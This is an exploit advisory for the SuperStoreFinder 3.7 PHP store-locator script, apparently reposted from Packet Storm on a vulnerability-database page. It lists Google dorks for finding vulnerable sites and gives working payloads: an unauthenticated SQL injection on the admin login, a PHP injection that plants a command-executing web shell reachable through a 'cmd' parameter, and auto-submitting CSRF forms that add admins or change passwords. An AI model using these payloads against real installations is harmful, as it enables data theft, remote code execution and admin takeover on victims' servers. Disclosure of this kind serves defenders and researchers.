Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SuperStoreFinder 3.7 XSS / CSRF / Command Execution

🗓️ 27 Feb 2024 00:00:00Reported by bRpsdType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 271 Views

SuperStoreFinder 3.7 XSS / CSRF / Command Execution, Unauthenticated SQL Injection, Authenticated PHP Injection, Google Maps API Integrated PHP Locator Scrip

Code
`@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
.:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities  
  
.:. Google Dorks .:.  
"designed and built by Joe Iz."  
"Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman."  
inurl:/superstorefinder/index.php  
  
.:. Date: 0ctober 13, 2023  
.:. Exploit Author: bRpsd  
.:. Contact: cy[at]live.no  
.:. Vendor -> https://www.superstorefinder.net/  
.:. Product -> https://codecanyon.net/item/super-store-finder/3630922  
.:. Product Version -> [3.7 and below]  
.:. DBMS -> MySQL  
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
  
  
#############  
|DESCRIPTION|  
#############  
"Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. Your customers will never be lost again getting to your stores / locations"  
  
  
  
  
  
  
Vulnerability 1: Unauthenticated SQL Injection  
Types: boolean-based blind,error-based, time-based blind  
File: localhost/admin/index.php  
Vul Parameter: USERNAME [POST]  
  
===========================================================================================  
Vulnerability 1: Unauthenticated SQL Injection  
Types: boolean-based blind,error-based, time-based blind  
File: localhost/admin/index.php  
Vul Parameter: USERNAME [POST]  
  
  
  
Test #1  
  
http://localhost:9000/adminstorefinder/admin/index.php  
  
username=a'&password=1&btn_login=Login  
  
Response Error:  
Array  
(  
[0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1  
)  
SELECT users.* FROM users WHERE users.username='admin''  
===========================================================================================  
  
Test #2 => Payload (Proof Of Concept)  
  
http://localhost:9000/adminstorefinder/admin/index.php  
  
username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj  
&password=1&btn_login=Login  
  
  
Response Error:  
Array  
(  
[0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist  
)  
===========================================================================================  
  
  
  
======================================================================================================================================================================================  
Vulnerability 2: Authenticated PHP Injection - Remote Code Exectuion  
File: localhost/admin/settings.php  
Vul Parameter: language_set [POST]  
  
  
Proof of concept:  
http://localhost:9000/superstorefinder/admin/settings.php  
langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1  
  
  
Index.php included in the config.inc.php , we just can go for rce  
with GET parameter ?cmd=  
  
  
http://localhost:9000/?cmd=uname -a  
  
Reponse:  
22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64  
===========================================================================================  
  
  
  
  
===========================================================================================  
Vulnerability 3: Cross Site Request Forgery  
Risk: It can lead to Privilege Escalation through adding admins or changing admin password.  
Affected Files (1): localhost/superstorefinder/admin/users_add.php  
Parameters: username,password,cpassword  
  
Proof of concept:  
<iframe style="display:none" name="CSRF"></iframe>  
<form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">  
<input name="submit_hidden" value="submit_hidden" type="hidden" />  
<input type='hidden' name='username' value='X'>  
<input type='hidden' name='password' value='123'>  
<input type='hidden' name='cpassword' value='123'>  
<input type='hidden' value='submit'>  
</form>  
<script>document.getElementById("CSRF").submit()</script>  
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>  
  
  
  
  
Affected Files (2:):localhost/superstorefinder/admin/change_password.php  
Parameters: password,cpassword,save  
  
Proof of concept:  
<iframe style="display:none" name="CSRF"></iframe>  
<form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">  
<input type='hidden' name='password' value='123'>  
<input type='hidden' name='cpassword' value='123'>  
<input type='hidden' name="save=" value='save'>  
</form>  
<script>document.getElementById("CSRF").submit()</script>  
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>  
======================================================================================  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Feb 2024 00:00Current
7.4High risk
Vulners AI Score7.4
superstorefinderxsscsrfcommand executionunauthenticated sql injectionauthenticated php injectiongoogle maps apiphp locator scriptmysqlmulti-languagegoogle dorksjoe iz
271